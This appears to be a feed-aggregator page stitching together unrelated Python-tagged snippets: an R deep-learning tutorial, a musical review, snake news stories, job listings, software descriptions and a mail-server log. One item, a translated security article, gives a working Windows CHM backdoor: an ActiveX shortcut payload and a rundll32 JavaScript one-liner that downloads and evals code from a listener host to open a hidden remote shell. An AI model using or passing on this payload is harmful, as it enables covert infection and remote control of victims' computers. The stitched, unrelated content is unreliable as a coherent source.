In my last blogpost about Random Forests I introduced the codecentric.ai Bootcamp. The next part I published was about Neural Networks and Deep Learning. Every video of our bootcamp will have example code and tasks to promote hands-on learning. While the practical parts of the bootcamp will be using Python, below you will find the English R version of this Neural Nets Practical Example, where I explain how neural nets learn and how the concepts and techniques translate to training neural nets in R with the H2O Deep Learning function. You can find the video on YouTube but, as before, it is only available in German. Same goes for the slides, which are also currently German only. See the end of this article for the embedded video and slides. Neural Nets and Deep Learning Just like Random Forests, neural nets are a method for machine learning and can be used for supervised, unsupervised and reinforcement learning. The idea behind neural nets was already developed back in the 1940s as a way to mimic how our human brain learns. That's why neural nets in machine learning are also called ANNs (Artificial Neural Networks). When we say Deep Learning, we talk about big and complex neural nets, which are able to solve complex tasks, like image or language understanding. Deep Learning has gained traction and success particularly with the recent developments in GPUs and TPUs (Tensor Processing Units), the increase in computing power and data in general, as well as the development of easy-to-use frameworks, like Keras and TensorFlow. We find Deep Learning in our everyday lives, e.g. in voice recognition, computer vision, recommender systems, reinforcement learning and many more. The easiest type of ANN has only one node (also called a neuron) and is called a perceptron. Incoming data flows into this neuron, where a result is calculated, e.g. by summing up all incoming data.
Each of the incoming data points is multiplied by a weight; weights can basically be any number and are used to modify the results that are calculated by a neuron: if we change the weight, the result will change also. Optionally, we can add a so-called bias to the data points to modify the results even further. But how do neural nets learn? Below, I will show this with an example that uses common techniques and principles. Libraries First, we will load all the packages we need: tidyverse for data wrangling and plotting readr for reading in a csv h2o for Deep Learning (h2o.init initializes the cluster) library(tidyverse) library(readr) library(h2o) h2o.init(nthreads = -1) ## Connection successful! ## ## R is connected to the H2O cluster: ## H2O cluster uptime: 3 hours 46 minutes ## H2O cluster timezone: Europe/Berlin ## H2O data parsing timezone: UTC ## H2O cluster version: 3.20.0.8 ## H2O cluster version age: 1 month and 16 days ## H2O cluster name: H2O_started_from_R_shiringlander_jpa775 ## H2O cluster total nodes: 1 ## H2O cluster total memory: 3.16 GB ## H2O cluster total cores: 8 ## H2O cluster allowed cores: 8 ## H2O cluster healthy: TRUE ## H2O Connection ip: localhost ## H2O Connection port: 54321 ## H2O Connection proxy: NA ## H2O Internal Security: FALSE ## H2O API Extensions: XGBoost, Algos, AutoML, Core V3, Core V4 ## R Version: R version 3.5.1 (2018-07-02) Data The dataset used in this example is a customer churn dataset from Kaggle. Each row represents a customer; each column contains customer attributes. We will load the data from a csv file and look at density plots of the numeric variables: telco_data %>% select_if(is.numeric) %>% gather() %>% ggplot(aes(x = value)) + facet_wrap(~ key, scales = "free", ncol = 4) + geom_density() ## Warning: Removed 11 rows containing non-finite values (stat_density). … and barcharts for categorical variables.
telco_data %>% select_if(is.character) %>% select(-customerID) %>% gather() %>% ggplot(aes(x = value)) + facet_wrap(~ key, scales = "free", ncol = 3) + geom_bar() Before we can work with h2o, we need to convert our data into an h2o frame object. Note that I am also converting character columns to categorical columns, otherwise h2o will ignore them. Moreover, we will need our response variable to be in categorical format in order to perform classification on this data. hf <- telco_data %>% mutate_if(is.character, as.factor) %>% as.h2o Next, I'll create a vector of the feature names I want to use for modeling (I am leaving out the customer ID because it doesn't add useful information about customer churn). hf_X
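The single-neuron computation described above (a weighted sum of the inputs plus a bias, passed through an activation) can be sketched in a few lines. This is a generic illustration in Python, not code from the bootcamp or from H2O, and the weights and bias are arbitrary made-up values, not learned ones:

```python
# Minimal sketch of a perceptron: weighted sum of inputs plus a bias,
# passed through a step activation function.
def perceptron(inputs, weights, bias):
    total = sum(x * w for x, w in zip(inputs, weights)) + bias
    return 1 if total > 0 else 0

# Weighted sum = 0.5*0.4 + (-1.0)*0.3 + 2.0*0.2 = 0.3; plus bias -0.1 -> 0.2 > 0
print(perceptron([0.5, -1.0, 2.0], [0.4, 0.3, 0.2], bias=-0.1))  # -> 1
```

Training then consists of nudging those weights and the bias until the outputs match the desired targets, which is what the H2O Deep Learning function does at scale.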
          BWW Review: SPAMALOT at Lied Center For Performing Arts, Lincoln      Cache   Translate Page      

I don't like Spam. To me, it's mystery meat and I don't like the taste. I looked it up on the internet to see what it is made from. It was introduced by Hormel in 1937 to increase the sale of pork shoulder. Few know the true origination of the name "Spam," but suggestions include "Specially Processed Army Meat." My favorite more colorful descriptions are "meatloaf without basic training" and "ham that didn't pass its physical." Spam has recently been adopted as the term for inappropriate or irrelevant messages that flood our inboxes. This all fits.

Contrary to my aforementioned comment, I do like SPAM...A-LOT. It's a real treat precisely because it is tasteless. It's crazy fun with zingers shooting all over the place, people doing the bizarre, and clever little inappropriate messages conveyed with tongue in cheek.

SPAMALOT, also billed as "Monty Python's SPAMALOT, A new musical lovingly ripped off from the motion picture Monty Python and the Holy Grail," is two full hours of delightful nonsense.

The original screenplay was a collaboration of Graham Chapman, John Cleese, Terry Gilliam, Eric Idle, Terry Jones, and Michael Palin. I can only imagine how much fun these men had as they crafted this piece. Perhaps they even formed a dance line and sang silly songs as they marched up to their round table.

John DuPrez and Eric Idle wrote the music and Eric Idle wrote the book and lyrics. The musical opened on Broadway in 2005 and won a Tony Award for Best Musical while being nominated for a total of 14 awards. It went on to capture a Grammy for Best Musical Show Album. SPAMALOT has played in London's West End, Broadway, all across the US and UK, Las Vegas, and at a variety of international locations. It's still going strong. But why? What's in this show?

SPAMALOT is a can filled with a little bit of everything. There are references to scenes from well known musicals such as the bottle dance in FIDDLER ON THE ROOF, the dancing rivalry between the gangs in WEST SIDE STORY, and Barbra Streisand's "People," from FUNNY GIRL. I even sensed a nod to WIZARD OF OZ with their guards and their man behind the puppet. There's a dash of intrigue with James Bond, and a smattering of Las Vegas with glitzy showgirls and inappropriate shenanigans. There's a hint of social issues such as gender identification and same sex marriage, an autocratic government, and differences in religion.

The story heads straight for (well, maybe tipsily toward) a big musical finish. The problem is that Jews are a necessary ingredient for any successful musical. King Arthur and his knights are hard pressed to find Jews in their quest for the Holy Grail. One of the biggest laughs of the evening was King Arthur's sidekick, coconut clapping Patsy telling him that he didn't confess that he himself was Jewish because "it's not the sort of thing you say to a heavily armed Christian."

You may not need Andrew Lloyd Weber for a successful musical, but you do need performers who can play off this offbeat humor with seriousness, sing extremely well, and dance like pros. Steve McCoy (King Arthur) and Kasidy Devlin (Sir Robin) are definitely up to the task and lead a great cast.

Satire, slapstick, irony...it's all mixed up to build a ridiculously successful show that appeals to the crowd. There are too many good jokes to cover them all. My favorite, though, is Not Dead Fred.

The question of not being dead reappears throughout the show. After being around for the past 13 years, SPAMALOT is clearly not dead yet. What a way to bring the new 2018/2019 season to life!

Photo Credit: Scott Suchman


          5 amphibious vehicles you can buy right now      Cache   Translate Page      
Watercar (Fountain Valley, California, USA). Perhaps the most prominent maker of amphibious cars. Founded in 1999, it made its name producing "the world's fastest amphibian" (in 2010 the Watercar Python entered the Guinness Book of Records). Today the company builds a single model, the Watercar Panther with a Honda engine, whose generation was updated in 2017. The cars are built […]
          Python presents slithery situation at Texas Goodwill store      Cache   Translate Page      
FORT WORTH, Texas (AP) — A Goodwill worker collecting clothes and other items at a Texas sorting center was surprised to find an albino python clinging to the side of a bin. The python was huddled in a pile of clothes when the worker discovered it Thursday at the center in Fort Worth. Manager James Murphy says it's not clear if the snake slithered away from its owner and was accidentally dropped off or if its donation was intentional. The python had a serpentine journey: It arrived at one of nearly 40 Goodwill donation drop-offs in the area before being transported to the Fort Worth sorting center. Goodwill staffers will care for the python until the owner claims it or a permanent home is found.
          C++ Developer with Python skills - Experis - Rahway, NJ      Cache   Translate Page      
Mercury, Segue, Borland. This specialization is usually performed by a senior test practitioner with experience in leading large test teams....
From Experis - Tue, 23 Oct 2018 17:42:46 GMT - View all Rahway, NJ jobs
          Advanced combination techniques for building bundled backdoors, with defense advice      Cache   Translate Page      
0x01 What is CHM Before explaining how to use a CHM as a backdoor, we first need to know what a CHM actually is. CHM (Compiled Help Manual) means "compiled help file". It is Microsoft's newer generation of help-file format: it uses HTML as the source and compiles the help content into a database-like store. CHM supports JavaScript, VBScript, ActiveX, Java applets, Flash, common image formats (GIF, JPEG, PNG), audio and video files (MID, WAV, AVI) and so on, and can link to the Internet through URLs. Because it is convenient and versatile, it has also been adopted as an e-book format. 0x02 Building a CHM There are many ways to build a CHM, and several tools are available, so I will not describe them in detail here. For this test I used EasyCHM, which is very easy to use. Create a directory like the following (the file contents do not matter): Open EasyCHM, choose New -> Browse and select that directory, keeping the default file types: Click OK to preview the CHM file: Choose Compile to build it into a CHM file. 0x03 CHM Execute Command In 2014, @ithurricanept posted a demo on Twitter that runs the calculator through a CHM: The exploit code is as follows: <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',calc.exe'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>  Write the code above into an HTML file, place it in the project directory, compile it into a CHM file and run it; the calculator pops up: 0x04 Removing the pop-up Anyone who has tested nishang's Out-CHM will have noticed an obvious pop-up window when running the generated CHM file. Like this: One evening it suddenly occurred to me that there is a good way to keep the window from showing: combine the CHM with a JavaScript backdoor. In testing, I successfully obtained a meterpreter session without any visible window. This test uses a Python version of JSRat.ps1 that I modified, available at https://github.com/Ridter/MyJSRat (see the readme for usage). The complete test procedure follows: 1. Combining CHM + JS backdoor Start the JSRat server in interactive mode: python MyJSRat.py -i 192.168.1.101 -p 8080 Visit http://192.168.1.101:8080/wtf to obtain the attack code: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}  After several tests, this command was successfully written into a CHM; its HTML code is: <!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>This is a demo ! 
<br><OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET"," http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'> <PARAM name="Item2" value="273,1,1"></OBJECT><SCRIPT>x.Click();</SCRIPT></body></html>  Compile and run it, and a JS interactive shell is successfully obtained: Running cmd /c command directly shows a black console window; run can be used to avoid showing it. After executing run, type whoami […]
          Migration Consultant OpenVMS      Cache   Translate Page      
Migration Consultant (OpenVMS) > Location: Slough > Division: Transoft > Function: Professional Services > Reporting to: Martin Farndale We’re Advanced Join a business that embraces innovation, gives you the scope to seize every opportunity and will help get you where you want to go. Life at Advanced begins in an unprecedented environment with a role that matters, taking you on a fast paced journey of discovery, however big that might be. We’re one of the UK’s largest and fastest growing software companies. True partnership is the defining thing that makes us different from the competition. We pride ourselves on delivering focused software solutions for public sector, enterprise commercial and health & care organisations that simplify complex business challenges and deliver immediate value. Team & Role We are seeking an experienced Migration Consultant with a successful track record of delivering application and data migration solutions from the OpenVMS legacy system. The Migration Consultant will specialise in refactoring legacy systems from 3rd generation languages such as C/C++. This role requires in depth C/C++ skills and extensive real-world experience preferably in a broad range of business software systems. This role involves the application of Transoft technologies to help deliver a sustainable future for crucial business applications. The Requirements You will: Learn and operate the Transoft modernisation toolset Function as an effective project team member Maintain a cooperative nature at all times Maintain the ability to both take instruction and work under own initiative as required. Be able to maintain a sharp focus on and finish intensive projects. 
Have a good awareness of technological developments and best practice Be able to adapt and apply new ideas as appropriate Successfully hand over solutions to relevant internal or external staff, including knowledge transfer Deliver and promote quality, excellence and continuous service improvement for Professional Services engagements Keep abreast of new features and functions made available within the Advanced 365 suite of products We would like you to have: The successful candidate requires strong consultancy skills, and is an excellent motivator of individuals in order to meet deadlines and manage change. You will have real-world experience of delivering concurrent small & medium scale projects on time and within budget. Experience needed: 5+ years of C/C++ design, implementation and support In-depth experience within Windows and Linux development including operating system APIs OpenVMS experience is an advantage Database design and implementation – SQL is a must Modern build and deployment experience (i.e.
Gradle, Cmake) Scripting in Perl or Python an advantage Transoft toolset training will be provided Essential Skills: Strong communication skills, written and spoken Well presented and good interpersonal skills Comfortable in both structured and unstructured working environments Energy and enthusiasm to deliver a successful project Comfortable in customer facing role Education / Qualifications A university degree in a relevant subject Join the A Team Excellent benefits from day one: contributory pension, life insurance, income protection insurance, childcare voucher salary sacrifice, cycle to work scheme, and employee assistance programme 25 days holidays Special focus on training and development with the opportunity to excel your career from our internal Talent Development Team The ability to work with engaged colleagues who share a passion for solving business problems Working in an organisation that encourages 360 feedback at all levels Be part of an organisation that has recently been ranked by Deloitte in the Top 50 fastest growing tech Companies
          Quartz/python application developers      Cache   Translate Page      
Currently working on manipulating data fields to get desired output in sandra database (Budget: $250 - $750 USD, Jobs: Object Oriented Programming (OOP), Python)
          Scraping Project      Cache   Translate Page      
We need to get pricing from our competitors in Australia & NZ (Budget: $250 - $750 AUD, Jobs: Data Mining, PHP, Python, Software Architecture, Web Scraping)
          [Translated] A Beginner's Guide to Time Series Forecasting      Cache   Translate Page      

This article is a follow-up to "A Complete Tutorial on Time Series Modeling in R"; the difference is that this one uses Python for the walkthrough. Building on the original, this article […]

The post [Translated] A Beginner's Guide to Time Series Forecasting appeared first on 标点符.


          PilotEdit Lite      Cache   Translate Page      
PilotEdit Lite is a lightweight text editor intended primarily for programmers. It is the free edition of an extensive and fairly popular application. Its functionality is somewhat limited compared to the paid edition, but it is very well suited to home use. It can edit very large files (over 50 gigabytes) and supports coding in many programming languages (C, C++, Java, Python, C#, PHP, Perl, Visual Basic and others). A basic element of any good editor is the ability to adapt to the user's preferences, and PilotEdit Lite does remarkably well in this category. The user can easily change the layout of all panels and hide selected ones. Handling multiple documents in one window, displayed on tabs, is standard and available in this editor as well. The bottom part of the window shows basic statistics about the currently edited document (format, character encoding, size, cursor position, current keyboard state). An extremely important feature of the application is the extensive module for searching and replacing text fragments in files. Apart from the standard options for editing a single document, this process can be automated.
Other interesting features of the application include: - full Unicode support, - basic document-modifying functions (changing letter case, removing spaces, inserting dates, calibrating indent width), - the ability to preserve the directory structure when saving to another location, - simple switching between many character encodings, - support for regular expressions, - comparing the contents of directories, - the ability to define file groups (loading a file list takes a single click), - automatic creation of backups, - syntax highlighting, - hexadecimal editing mode, - unlimited undo and redo, - working with remote locations (FTP server support), - column selection mode, - support for character tables (including the ability to create custom sets), - a list of most frequently used files. PilotEdit Lite comes with accessibly written documentation that explains the details of using the program; it is included in the installation package.
          Adjunct Instructor - Computer Science - Casper College - Casper, WY      Cache   Translate Page      
Teach courses at the freshman and sophomore level, including C++ and Visual Basic, Python, and Java Teaching. The Adjunct Computer Science Instructor teaches a...
From Casper College - Fri, 26 Oct 2018 19:05:54 GMT - View all Casper, WY jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with Java, JavaScript, C#, PHP, Visual Basic, Python, HTML, XML, CSS, and AJAX. Experience with software installation and maintenance, specifically...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Jr. Java Developer - DISH Network - Cheyenne, WY      Cache   Translate Page      
GoLang, Java, Python. A successful Junior Java Developer will:. Have 3+ years of professional enterprise development experience. Sling TV L.L.C....
From DISH - Wed, 19 Sep 2018 16:13:34 GMT - View all Cheyenne, WY jobs
          API Test Automation Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
GoLang, Java, Python, JavaScript, Type Script. Have 3+ years of professional enterprise development / testing experience. Sling TV L.L.C....
From DISH - Fri, 14 Sep 2018 17:19:08 GMT - View all Cheyenne, WY jobs
          Senior Data Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
4 or more years of experience in programming and software development with Python, Perl, Java, and/or other industry standard language....
From DISH - Wed, 15 Aug 2018 05:17:45 GMT - View all Cheyenne, WY jobs
          Software Developer - Matric - Morgantown, WV      Cache   Translate Page      
Application development with Java, Python, Scala. Enterprise level web applications. MATRIC is a strategic innovation partner providing deep, uncommon expertise...
From MATRIC - Tue, 11 Sep 2018 00:02:33 GMT - View all Morgantown, WV jobs
          SPECwpc releases SPECworkstation 3      Cache   Translate Page      

SPECworkstation 3 is an entirely new version of the benchmark previously known as SPECwpc. It is free for existing users and members of the group; PC vendors pay 5,000 dollars. In the new version the storage workloads have been completely reworked based on traces of the behavior of almost twenty applications, and there are also new workloads reflecting the changes in updated versions of the Blender, Handbrake, Python and LuxRender applications.


          Mid SOC Analyst - XOR Security - Fairmont, WV      Cache   Translate Page      
(e.g., Splunk dashboards, Splunk ES alerts, SNORT signatures, Python scripts, Powershell scripts.). XOR Security is currently seeking talented Cyber Threat...
From XOR Security - Sat, 14 Jul 2018 02:06:16 GMT - View all Fairmont, WV jobs
          Python - Small job      Cache   Translate Page      
I need a Python developer for my current projects. If you have knowledge please bid. Details will be shared in message with the freelancers. (Budget: $14 - $80 NZD, Jobs: Data Mining, Python)
          Python function to show and compare text files in excel      Cache   Translate Page      
I've some files in a folder, I need to copy them to excel file and compare each file with one of the reference file and show if any difference is there, color that cell with a color. Need to complete... (Budget: $30 - $250 USD, Jobs: Data Processing, Excel, Python, Software Architecture)
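The comparison step of the task described in this posting can be sketched with the standard library alone: find, for each file, which lines differ from the reference file. The resulting row indices are what an Excel writer (e.g. openpyxl, not shown here) would use to fill the differing cells with a color. `diff_lines` is a hypothetical helper, not part of the posting:

```python
# Find the 0-based indices of lines that differ between a candidate file
# and a reference file; missing trailing lines also count as differences.
from itertools import zip_longest

def diff_lines(candidate_lines, reference_lines):
    """Return indices of lines where candidate and reference disagree."""
    return [i for i, (a, b) in enumerate(zip_longest(candidate_lines, reference_lines))
            if a != b]

print(diff_lines(["a", "b", "c"], ["a", "x", "c", "d"]))  # -> [1, 3]
```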
          Python Course H – Chapter 3 (Functions and Modules) – Lesson 5 (The Standard Library and pip)      Cache   Translate Page      

Python Programming Course H. Chapter 3: Functions and Modules in Python. Lesson 5: The Python Standard Library and pip. In the previous lesson we gave a general overview of modules; in this lesson we will look at the Python standard library (which comprises a collection of modules). Types of modules: there are three main kinds of modules in Python […]

The post Python Course H – Chapter 3 (Functions and Modules) – Lesson 5 (The Standard Library and pip) first appeared on Full Kadeh.
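A tiny illustration of the distinction this lesson draws: standard-library modules ship with every Python installation and import without any installation step, while third-party packages must first be installed with pip (e.g. `pip install requests`). The module choices below are ordinary stdlib examples, not ones prescribed by the course:

```python
# Standard-library modules need no pip install: they come with Python itself.
import math
import random

print(math.sqrt(16))          # -> 4.0
print(random.randint(1, 10))  # an integer between 1 and 10
```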


          Python Course H – Chapter 3 (Functions and Modules) – Lesson 4 (Modules)      Cache   Translate Page      

Python Programming Course H. Chapter 3: Functions and Modules in Python. Lesson 4: Modules in Python. Before studying this lesson, first read the article "What is a module?! What is modular programming?!", then continue here with Full Kadeh. Modules in Python: the main way to use modules in Python is to add the statement […]

The post Python Course H – Chapter 3 (Functions and Modules) – Lesson 4 (Modules) first appeared on Full Kadeh.
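The lesson's sentence is cut off, but the standard way to use modules in Python is the import statement. A small generic sketch of its common forms (the module choices are illustrative, not taken from the course):

```python
# Three common forms of the import statement.
import math                 # qualified access: math.pi
from math import sqrt       # import a single name directly
import statistics as stats  # import under an alias

print(math.pi > 3.14)            # True
print(sqrt(9))                   # 3.0
print(stats.mean([1, 2, 3]) == 2)  # True
```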


          Python Course H – Chapter 3 (Functions and Modules) – Lesson 3 (Function Objects)      Cache   Translate Page      

Python Programming Course H. Chapter 3: Functions and Modules in Python. Lesson 3: Function Objects in Python. In the first lesson of Chapter 3 we became familiar with functions! Here we will get to know another aspect of them. Function objects in Python: although functions differ from ordinary variables, they too, like every […]

The post Python Course H – Chapter 3 (Functions and Modules) – Lesson 3 (Function Objects) first appeared on Full Kadeh.
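A small generic sketch of the "functions are objects" idea the lesson introduces: a function can be assigned to a variable, stored in a data structure, and passed around like any other value (all names below are illustrative, not from the course):

```python
# Functions are objects: assign them, store them, pass them.
def shout(text):
    return text.upper() + "!"

speak = shout              # assign the function itself (no parentheses)
handlers = {"loud": shout} # store it in a dict

print(speak("hello"))          # -> HELLO!
print(handlers["loud"]("hi"))  # -> HI!
```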


          "Python Basics Tutorial (3rd Edition)" shared at a low price      Cache   Translate Page      
A member of this forum priced it at 3,000 forum coins, which I cannot afford. I commented that the price was steep and was even told I was being mean; fine, I wouldn't dare grab your precious book. I downloaded the same book elsewhere and am now sharing it at a low price. May everyone keep accumulating knowledge and make progress every day.
          PYTHON APPLICATIONS DEVELOPER - Givex - Toronto, ON      Cache   Translate Page      
We are seeking technically oriented application developers who are passionate about coding and relentless in the pursuit of excellence. Daily responsibilities...
From Givex - Fri, 03 Aug 2018 07:39:22 GMT - View all Toronto, ON jobs
          Backend Programmer or Developer      Cache   Translate Page      
Inmobilio - Floridablanca, Santander - We are looking for a systems or electronics engineer for backend development, with knowledge of microservices using the Django framework, in the Python language, and of relational databases using PostgreSQL. Minimum requirements: Man...
          Machine learning Python hacks, creepy Linux commands, Thelio, Podman, and more      Cache   Translate Page      
I'm filling in again for this week's top 10 while Rikki Endsley is recovering from LISA 18, held last week in Nashville, Tennessee. We're starting to gather articles for our 4th annual Open Source ... - Source: opensource.com
          Two reticulated pythons seized at the Jicomé interagency checkpoint      Cache   Translate Page      
Esperanza, Valverde. Two reticulated pythons were seized by members of the Ministries of Defense and Environment while they were being transported in a truck.


Ramón Aníbal Almonte, provincial head of the Environment Ministry in Valverde, said the seizure took place last Sunday at the Jicomé interagency checkpoint on the Esperanza-Navarrete highway, as the snakes were being moved from Santiago Rodríguez to Santiago.

He explained that, when measured, one of the snakes proved to be 5.5 meters long and the other 5 meters, and that by order of Environment Minister Ángel Estévez they were handed over to the National Zoological Park.

As for the vehicle, he stated that it was returned to its owners from Santiago Rodríguez, and that only the two reptiles were seized.

In Valverde province, a video posted on social media has gone viral showing one of the reticulated pythons being unloaded from the truck; it was said they had been seized in Mao.

The reticulated python (Malayopython reticulatus) is a snake of the family Pythonidae native to Southeast Asia and Wallacea. Genetic studies hold that the genus Python is paraphyletic and that this species should belong to a new genus, Malayopython.

The reticulated python is the longest snake in the world (it can reach 9 meters), a record that only the anaconda of South America can dispute. Even so, the usual size of the species is between 5 and 6 meters. Females, as in the vast majority of snake species, are larger than males.

Rather aquatic in its habits, it lives in the tropical rainforests of Southeast Asia, Malaysia, Indonesia and the Philippines.



          Internship on Live Projects - Anvita Electronics Pvt Ltd - Hyderabad, Telangana      Cache   Translate Page      
Bachelor or Masters of Engineering in the area of ECE, EEE, CSE, IT. Any one of the following programming languages is required: Embedded C, VHDL, Python, Matlab, Hardware... ₹2,000 - ₹8,000 a month
From Indeed - Fri, 02 Nov 2018 06:53:50 GMT - View all Hyderabad, Telangana jobs
          Cyber Security Engineer - Force 3 - Dulles, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc. CYBER SECURITY ENGINEER....
From Force 3 - Fri, 19 Oct 2018 07:33:09 GMT - View all Dulles, VA jobs
          Security Consultant - Force 3 - Dulles, VA      Cache   Translate Page      
Java, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, etc. TS Clearance required....
From Force 3 - Fri, 19 Oct 2018 07:33:09 GMT - View all Dulles, VA jobs
          Software Engineer - Xator Corporation - Dulles, VA      Cache   Translate Page      
Java, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, etc. Vaxcom Services, Inc....
From Xator Corporation - Fri, 31 Aug 2018 16:56:28 GMT - View all Dulles, VA jobs
          Cyber Engineer Entry, Mid, Senior, Manager - Dulles, VA - TS/SCI - IntellecTechs, Inc. - Dulles, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc....
From Indeed - Sun, 12 Aug 2018 23:51:07 GMT - View all Dulles, VA jobs
          Cyber Engineer - TS/SCI Required - Talent Savant - Dulles, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc....
From Talent Savant - Fri, 27 Jul 2018 06:03:39 GMT - View all Dulles, VA jobs
          Senior Cyber Engineer - TS/SCI Required - Talent Savant - Dulles, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc. Senior Cyber Engineer....
From Talent Savant - Fri, 27 Jul 2018 05:57:09 GMT - View all Dulles, VA jobs
          Cyber Engineer - Criterion Systems - Sterling, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, Python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc....
From Criterion Systems - Mon, 20 Aug 2018 17:51:49 GMT - View all Sterling, VA jobs
          Cyber Security Engineer - ProSOL Associates - Sterling, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc. ProSol is supporting a U.S....
From ProSOL Associates - Thu, 09 Aug 2018 03:12:29 GMT - View all Sterling, VA jobs
          Cybersecurity Engineer - Novel Applications of Vital Information - Dulles, VA      Cache   Translate Page      
Java, Swing, Hibernate, Struts, JUnit, Perl, Ruby, python, HTML, C, C++, .NET, ColdFusion, Adobe, Assembly language, etc. ALL CANDIDATES MUST BE A U.S....
From Novel Applications of Vital Information - Sun, 16 Sep 2018 12:43:42 GMT - View all Dulles, VA jobs
          Comment on Creating a coin recognizer with Watson's Visual Recognition and OpenCV in Python3 by René Meyer      Cache   Translate Page      
This is a nice example. The only limit I see it is really hard to distinguish between € 1 cent from € 2 cent coins for a machine, especially from the backside only. In the second picture you see that the 1 cent coin is detected as 2 cent coin. Maybe you need to add some other information like the relative/absolute size to weight the result of Watson VR in a final step? I'm working on a similar Application for iOS with a serverless Python Backend and facing that problem now.
          Electrical Engineer/Systems Engineer - Kroenke Sports Enterprises - Fort Worth, TX      Cache   Translate Page      
Computer languages, supporting several microcontroller languages including (machine code, Arduino, .NET, ATMEL, Python, PASCAL, C++, Ladder, Function Block)....
From Kroenke Sports Enterprises - Sat, 13 Oct 2018 18:16:18 GMT - View all Fort Worth, TX jobs
          Scrub Python in the Sun      Cache   Translate Page      
Hardy Reptiles took their beautiful Merauke scrub python outside for a sunny fall photo shoot.
          AEP: Future Breeding Projects      Cache   Translate Page      
Always Evolving Pythons shows off some of their recent ball python babies as well as a new addition to their collection.
          Deep Green GTP      Cache   Translate Page      
Gonzalez Royal Pythons shows off a gorgeous green tree python from their collection in these nice photos.
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with Java, JavaScript, C#, PHP, Visual Basic, Python, HTML, XML, CSS, and AJAX. Experts Engaged in Delivering Their Best - This is the cornerstone of...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Geospatial Technical Principal - State of Wyoming - Cheyenne, WY      Cache   Translate Page      
Demonstrated skills in design of custom geospatial solutions, including use of the ArcGIS JavaScript API, Python and other appropriate resources.... $19.93 - $24.91 an hour
From State of Wyoming - Tue, 25 Sep 2018 02:50:28 GMT - View all Cheyenne, WY jobs
          Vulnerability Researcher - Raytheon - Melbourne, FL      Cache   Translate Page      
Whether in python, ruby, or some other language, you should be capable of quickly developing the tools needed to help you succeed in your reverse engineering...
From Raytheon - Thu, 11 Oct 2018 18:21:37 GMT - View all Melbourne, FL jobs
          Comment on How to Easily Set up a Full-Fledged Mail Server on Ubuntu 16.04 with iRedMail by Richard Whitney      Cache   Translate Page      
Thanks Xiao! I got those ports open (had a certificate path wrong). I cannot send/receive email from this server. Would you mind looking at this from syslog:

Nov 6 16:00:27 mail postfix/postscreen[99405]: CONNECT from [184.181.20.67]:50185 to [192.168.0.87]:25
Nov 6 16:00:27 mail systemd-resolved[66449]: Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP.
Nov 6 16:00:27 mail systemd-resolved[66449]: Server returned error NXDOMAIN, mitigating potential DNS violation DVE-2018-0001, retrying transaction with reduced feature level UDP.
Nov 6 16:00:28 mail postfix/postscreen[99405]: HANGUP after 1.9 from [184.181.20.67]:50185 in tests before SMTP handshake
Nov 6 16:00:28 mail postfix/postscreen[99405]: DISCONNECT [184.181.20.67]:50185
Nov 6 16:01:01 mail CRON[99448]: (root) CMD (python /opt/www/iredadmin/tools/cleanup_db.py >/dev/null 2>&1)
Nov 6 16:01:01 mail CRON[99449]: (root) CMD (python /opt/iredapd/tools/cleanup_db.py >/dev/null)
Nov 6 16:01:01 mail CRON[99450]: (root) CMD (python /opt/www/iredadmin/tools/delete_mailboxes.py)
Nov 6 16:01:01 mail CRON[99451]: (root) CMD (python /opt/iredapd/tools/cleanup_db.py >/dev/null)
Nov 6 16:01:01 mail CRON[99453]: (root) CMD (python /opt/www/iredadmin/tools/cleanup_db.py >/dev/null 2>&1)
Nov 6 16:01:01 mail CRON[99458]: (root) CMD (python /opt/www/iredadmin/tools/delete_mailboxes.py)
